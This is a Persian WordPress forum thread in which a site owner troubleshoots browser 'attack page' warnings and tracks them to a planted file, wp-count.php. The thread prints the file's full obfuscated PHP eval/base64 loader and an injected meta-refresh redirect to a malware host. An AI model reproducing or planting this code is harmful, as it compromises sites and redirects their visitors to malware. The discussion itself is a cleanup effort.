montazer

اررور Reported Attack Page!

18 پست در این موضوع قرار دارد

سلام دوستان

چند وقتیه زمانی که می خوام سایتم رو باز کنم مرورگرها اررور Reported Attack Page رو می دن :wacko:

تصویر اررور در فایرفاکس:

13665425711.png

گوگل وبمستر هم تو بخش malware به 24تا لینک سایت گیر داده، ولی از توضیحاتش سر در نیاوردم. :ph34r:

نمونه توضیحات مربوط به یک لینک:

Malware details
URL: http://mosbate24.ir/wp-count.php?ref=http%3A%2F%2Fwww.google.com%2Furl%3Fsa%3Dt%26rct%3Dj%26q%3Dmosbate24.ir%252B4105-dota-allstar-theme-changer%26source%3Dweb%26cd%3D2%26ved%3D0CCQQFjAA%26url%3Dhttp%253A%252F%252Fmosbate24.ir%252F4105-dota-allstar-theme-changer%252F%26ei%3D6YdgUdb4DsObdbRo%26usg%3DAFQjCNFmdEbu4EFa_Z5GguE2xbfgm-b5ag
Last checked: April 6, 2013
When Google last tested this page, your server returned content that directed the browser to a site that serves malware. Below is an example of suspected injected code. We recommend you check your source code for this and any other unauthorized changes, and reference our guidelines for cleaning your site and requesting a review.

Suspected injected code:
<meta http-equiv="refresh" content="0;url=h t t p : / / o a k m o n t m a n o
rhoa.com/news/house_distributes_construct_distance . p h p">

از دوستان اگر کسی تجربه داره لطفا راهنمایی کنه.

پیشاپیش ممنون

ویرایش شده در توسط montazer

به اشتراک گذاری این پست


لینک به پست

خطا که مشخصه

در فایل

http://mosbate24.ir/wp-count.php

چنین کدی هست


<meta http-equiv="refresh" content="0;url=http://oakmontmano
rhoa.com/news/house_distributes_construct_distance.php">

که کاربر رو هدایت میکنه به سایت آلوده

به اشتراک گذاری این پست


لینک به پست

خوب این فایل wp-count چی هست؟ اصلا از کجا اومده؟؟؟؟

وقتی هم بازش می کنی اولش یک سری عدد هست بعدش حروف به هم ریخته. فک کنم کد شده!

به اشتراک گذاری این پست


لینک به پست

حذفش کنید

مشخص نیست

شاید مربوط به افزونه‌ای باشه

به اشتراک گذاری این پست


لینک به پست

سلام

آره مربوط به افزونه امنیتی BulletProof Security هستش. پاک کنم دوباره می سازه.

ولی این بخش افزونه رو غیر فعال کردم. تا ببینم چی میشه.

جالب اینجاست که وقتی با کروم وارد این صفحه از انجمن میشی اینو مینویسه:


danger:malware ahead!

فکر کنم باید لینک oakmontmano rhoa.com/news/house_distributes_construct_distance رو از کل تاپیک پاک کنیم. واگرنه ممکن فایرفاکس هم گیر بده

ویرایش شده در توسط montazer

به اشتراک گذاری این پست


لینک به پست

به همون دلیل ویروسی شدن سایت شماست

سایتتون در کروم باز نمیشه

به اشتراک گذاری این پست


لینک به پست

سلام

محتوای فایل wp-count

<?php /* This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited. */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$GLOBALS['OOO0000O0']=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5}.$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$GLOBALS['OOO0000O0'].=$GLOBALS['OOO0000O0']{3}.$OOO000000{11}.$OOO000000{12}.$GLOBALS['OOO0000O0']{7}.$OOO000000{5};$GLOBALS['OOO000O00']=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$GLOBALS['O0O000O00']=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$GLOBALS['O0O000O00']=$O0O000O00.$OOO000000{3};$GLOBALS['O0O00OO00']=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$GLOBALS['OOO00000O']=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0xbe4;eval($GLOBALS['OOO0000O0']('JE8wMDBPME8wMD0kR0xPQkFMU1snT09PMDAwTzAwJ10oJE9PTzBPME8wMCwncmInKTskR0xPQkFMU1snTzBPMDBPTzAwJ10oJE8wMDBPME8wMCwweDU3ZCk7JE9PMDBPMDBPMD0kR0xPQkFMU1snT09PMDAwME8wJ10oJEdMT0JBTFNbJ09PTzAwMDAwTyddKCRHTE9CQUxTWydPME8wME9PMDAnXSgkTzAwME8wTzAwLDB4MWE4KSwnRW50ZXJ5b3V3a2hSSFlLTldPVVRBYUJiQ2NEZEZmR2dJaUpqTGxNbVBwUXFTc1Z2WHhaejAxMjM0NTY3ODkrLz0nLCdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvJykpO2V2YWwoJE9PMDBPMDBPMCk7'));return;?>~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alVnRPIq

من برای برقراری امنیت سایتم به افزونه ای که گفتم نیازی دارم. آیا راهی هست که افزونه رو غیر فعال نکنم؟ آیا واقعا محتوای wp-count دارای malware هست؟؟؟؟

این لینک هم یک توضیحاتی داده:

http://www.white-fire.co.uk/wordpress-malware-removal/

به اشتراک گذاری این پست


لینک به پست

محتوای فایل کد شده هست و نمیشه در مورد محتوای اصلی چیزی گفت (باید دیکد بشه!)

به اشتراک گذاری این پست


لینک به پست

محتوای فایل کد شده هست و نمیشه در مورد محتوای اصلی چیزی گفت (باید دیکد بشه!)

توسط سایت

http://ddecode.com

خواستم دیکد کنم ولی نشد :blink:

کسی می تونه کمک کنه!!! آخه این افزونه معروف و شناخته شده ای هست و فکر کنم واقعا Malware باشه. مخصوصا که گوگل وبمستر فقط به 24 تا لینک گیر داده که عموما هر 3الی 4 گیری که داده مربوط به یک مطلب گیر داده :wacko:

به اشتراک گذاری این پست


لینک به پست

بنظر داره روی سرور شما فایلی رو مینویسه.

شبیه کار بدافزارهاست.

بهتره حذفش کنید.

این افزونه رو از مخزن دریافت کردید؟

به اشتراک گذاری این پست


لینک به پست

بنظر داره روی سرور شما فایلی رو مینویسه.

شبیه کار بدافزارهاست.

بهتره حذفش کنید.

این افزونه رو از مخزن دریافت کردید؟

بله از مخرن گرفتم، افزونه با سابقه ایه و عملکرد خوبی هم داره، البته همانطور که گفتم:

مخصوصا که گوگل وبمستر فقط به 24 تا لینک گیر داده که عموما هر 3الی 4 گیری که داده مربوط به یک مطلب گیر داده :wacko:

مثلا به مطلب زیر گیر داده:

http://mosbate24.ir/4105-dota-allstar-theme-changer/

DNS Error هم می ده! :o:(

به اشتراک گذاری این پست


لینک به پست

DNS Error مربوط به هاست هست . با پشتیبان تماس بگیرید

به اشتراک گذاری این پست


لینک به پست

خوب اون فایل رو پاک کردم و افزونه رو هم غیرفعال :(

حال چقدر طول می کشه تا درست بشه؟

به اشتراک گذاری این پست


لینک به پست

( تجربی ) اغلب یک ساعته برطرف میشه و گاهی وقتها بر اساس آی پی یک روزه

به اشتراک گذاری این پست


لینک به پست


http://mosbate24.ir/wp-count.php

این فایل یک بد افزاره که توی شاخه اصلی وردپرس میزازن . چون شبیه فایل های اصل وردپرس هست معلوم نمیشه . برای منم این فایل در هاست بود . مجبور شدم کل هاست رو اسکن کنم . چند تایی از این فایل ها در سایر سایت هام پیدا کردم و پاکشون کردم . فکر نمیکنم دلیلش اون افزونه باشه . فایل رو پاک کنید ببینید بازم میسازتش . . .

بعد از اینکه هاستتون رو پاک سازی کردید به وبمستر گوگل برید ببینید امکانش هست تیگ لینک های دیتکت شده رو بزنید و اعلام کنید که فیکسشون کردید یا نه .

به اشتراک گذاری این پست


لینک به پست


http://mosbate24.ir/wp-count.php

این فایل یک بد افزاره که توی شاخه اصلی وردپرس میزازن . چون شبیه فایل های اصل وردپرس هست معلوم نمیشه . برای منم این فایل در هاست بود . مجبور شدم کل هاست رو اسکن کنم . چند تایی از این فایل ها در سایر سایت هام پیدا کردم و پاکشون کردم . فکر نمیکنم دلیلش اون افزونه باشه . فایل رو پاک کنید ببینید بازم میسازتش . . .

بعد از اینکه هاستتون رو پاک سازی کردید به وبمستر گوگل برید ببینید امکانش هست تیگ لینک های دیتکت شده رو بزنید و اعلام کنید که فیکسشون کردید یا نه .

اره درسته، مربوط به اون افزونه نبود. .الکی بهش نسبت ناروا دادیم :D

گفتم کل هاست رو یک اسکن کامل کنن. من خودم هرچی پاک می کنم دوباره میاد.

بعد سوال بعدی اینکه: این فایل از کجا و چه جوری اومده؟ :ph34r:

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری